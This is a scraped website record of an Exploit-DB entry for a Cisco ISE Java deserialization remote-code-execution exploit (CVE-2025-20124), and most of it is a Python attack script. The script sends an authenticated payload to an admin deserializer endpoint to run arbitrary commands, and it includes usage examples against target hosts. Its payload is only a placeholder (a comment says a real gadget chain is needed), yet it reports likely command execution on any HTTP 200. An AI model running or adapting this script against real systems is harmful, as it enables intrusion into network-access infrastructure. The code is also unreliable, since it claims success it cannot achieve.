{“lastseen”:”2025-08-11T16:26:28″,”description”:”Exploit Title: Cisco ISE 3.0 – Remote Code Execution (RCE) Exploit Author: @ibrahimsql ibrahimsql.com Exploit Author\\u0026#x27;s github: https:\/\/github.com\/ibrahmsql Description: Cisco ISE API Java Deserialization RCE CVE:…”,”published”:”2025-08-11T00:00:00″,”modified”:”2025-08-11T00:00:00″,”type”:”exploitdb”,”title”:”Cisco ISE 3.0 – Remote Code Execution (RCE)”,”source”:””,”references”:””,”id”:”EDB-ID:52396″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-20124″],”sourceData”:”# Exploit Title: Cisco ISE 3.0 – Remote Code Execution (RCE)\\r\\n# Exploit Author: @ibrahimsql ibrahimsql.com\\r\\n# Exploit Author’s github: https:\/\/github.com\/ibrahmsql\\r\\n# Description: Cisco ISE API Java Deserialization RCE\\r\\n# CVE: CVE-2025-20124\\r\\n# Vendor Homepage: https:\/\/www.cisco.com\/\\r\\n# Requirements: requests\\u003e=2.25.0, urllib3\\u003e=1.26.0\\r\\n# Usage: python3 CVE-2025-20124.py –url https:\/\/ise.target.com –session TOKEN –cmd \\”id\\”\\r\\n\\r\\n#!\/usr\/bin\/env python3\\r\\n# -*- coding: utf-8 -*-\\r\\n\\r\\nimport requests\\r\\nimport sys\\r\\nimport argparse\\r\\nimport base64\\r\\nimport urllib3\\r\\nurllib3.disable_warnings()\\r\\n\\r\\ndef banner():\\r\\n print(r\\”\\”\\”\\r\\n_________ .__ \\r\\n\\\\_ ___ \\\\|__| ______ ____ ____ \\r\\n\/ \\\\ \\\\\/| |\/ ___\/\/ ___\\\\\/ _ \\\\ \\r\\n\\\\ \\\\___| |\\\\___ \\\\\\\\ \\\\__( \\u003c_\\u003e )\\r\\n \\\\______ \/__\/____ \\u003e\\\\___ \\u003e____\/ \\r\\n \\\\\/ \\\\\/ \\\\\/ \\r\\n \\r\\nCisco ISE Java Deserialization RCE\\r\\nCVE-2025-20124\\r\\nAuthor: ibrahmsql | github.com\/ibrahmsql\\r\\n\\”\\”\\”)\\r\\n\\r\\ndef build_serialize_payload(cmd):\\r\\n \\”\\”\\”\\r\\n Java deserialization payload builder\\r\\n \\”\\”\\”\\r\\n java_cmd = cmd.replace(‘\\”‘, ‘\\\\\\\\\\”‘)\\r\\n # Placeholder serialization – ger\u00e7ek exploit i\u00e7in gadget chain gerekli\\r\\n payload = f’\\\\xac\\\\xed\\\\x00\\\\x05sr\\\\x00…ExecGadget…execute(\\”{java_cmd}\\”)’\\r\\n return base64.b64encode(payload.encode()).decode()\\r\\n\\r\\ndef exploit_deserialization(base_url, session_token, cmd):\\r\\n \\”\\”\\”\\r\\n CVE-2025-20124: Java Deserialization RCE\\r\\n \\”\\”\\”\\r\\n endpoint = f\\”{base_url}\/api\/v1\/admin\/deserializer\\”\\r\\n headers = {\\r\\n \\”Cookie\\”: f\\”ISESSIONID={session_token}\\”,\\r\\n \\”Content-Type\\”: \\”application\/json\\”,\\r\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (compatible; ISE-Exploit)\\”\\r\\n }\\r\\n \\r\\n payload = build_serialize_payload(cmd)\\r\\n data = {\\”object\\”: payload}\\r\\n \\r\\n print(f\\”[+] Target: {base_url}\\”)\\r\\n print(f\\”[+] Endpoint: {endpoint}\\”)\\r\\n print(f\\”[+] Command: {cmd}\\”)\\r\\n print(f\\”[+] Sending deserialization payload…\\”)\\r\\n \\r\\n try:\\r\\n r = requests.post(endpoint, json=data, headers=headers, verify=False, timeout=10)\\r\\n \\r\\n if r.status_code == 200:\\r\\n print(\\”[+] Payload successfully sent!\\”)\\r\\n print(\\”[+] Command possibly executed!\\”)\\r\\n if r.text:\\r\\n print(f\\”[+] Response: {r.text[:500]}\\”)\\r\\n elif r.status_code == 401:\\r\\n print(\\”[-] Authentication failed – invalid session token\\”)\\r\\n elif r.status_code == 403:\\r\\n print(\\”[-] Access denied – insufficient privileges\\”)\\r\\n elif r.status_code == 404:\\r\\n print(\\”[-] Endpoint not found – target may not be vulnerable\\”)\\r\\n else:\\r\\n print(f\\”[-] Unexpected response: {r.status_code}\\”)\\r\\n print(f\\”[-] Response: {r.text[:200]}\\”)\\r\\n \\r\\n except requests.exceptions.RequestException as e:\\r\\n print(f\\”[-] Request failed: {e}\\”)\\r\\n\\r\\ndef main():\\r\\n parser = argparse.ArgumentParser(\\r\\n description=\\”CVE-2025-20124 – Cisco ISE Java Deserialization RCE\\”,\\r\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\r\\n epilog=\\”\\”\\”\\r\\nExamples:\\r\\n python3 CVE-2025-20124.py –url https:\/\/ise.company.com –session ABCD1234 –cmd \\”id\\”\\r\\n python3 CVE-2025-20124.py –url https:\/\/10.0.0.1:9060 –session TOKEN123 –cmd \\”whoami\\”\\r\\n \\”\\”\\”\\r\\n )\\r\\n \\r\\n parser.add_argument(\\”–url\\”, required=True, help=\\”Base URL of Cisco ISE appliance\\”)\\r\\n parser.add_argument(\\”–session\\”, required=True, help=\\”Authenticated ISE session token\\”)\\r\\n parser.add_argument(\\”–cmd\\”, required=True, help=\\”Command to execute via deserialization\\”)\\r\\n \\r\\n args = parser.parse_args()\\r\\n \\r\\n banner()\\r\\n \\r\\n # URL validation\\r\\n if not args.url.startswith((‘http:\/\/’, ‘https:\/\/’)):\\r\\n print(\\”[-] URL must start with http:\/\/ or https:\/\/\\”)\\r\\n sys.exit(1)\\r\\n \\r\\n exploit_deserialization(args.url, args.session, args.cmd)\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52396″,”cvss”:{“score”:9.9,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:L\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52396″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-11T16:26:28″,”description”:”Exploit Title: Cisco ISE 3.0 – Remote Code Execution (RCE) Exploit Author: @ibrahimsql ibrahimsql.com Exploit Author\\u0026#x27;s github: https:\/\/github.com\/ibrahmsql Description: Cisco ISE API Java Deserialization RCE…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,45,12,40,13,7,11,5],"class_list":["post-10368","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-99","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n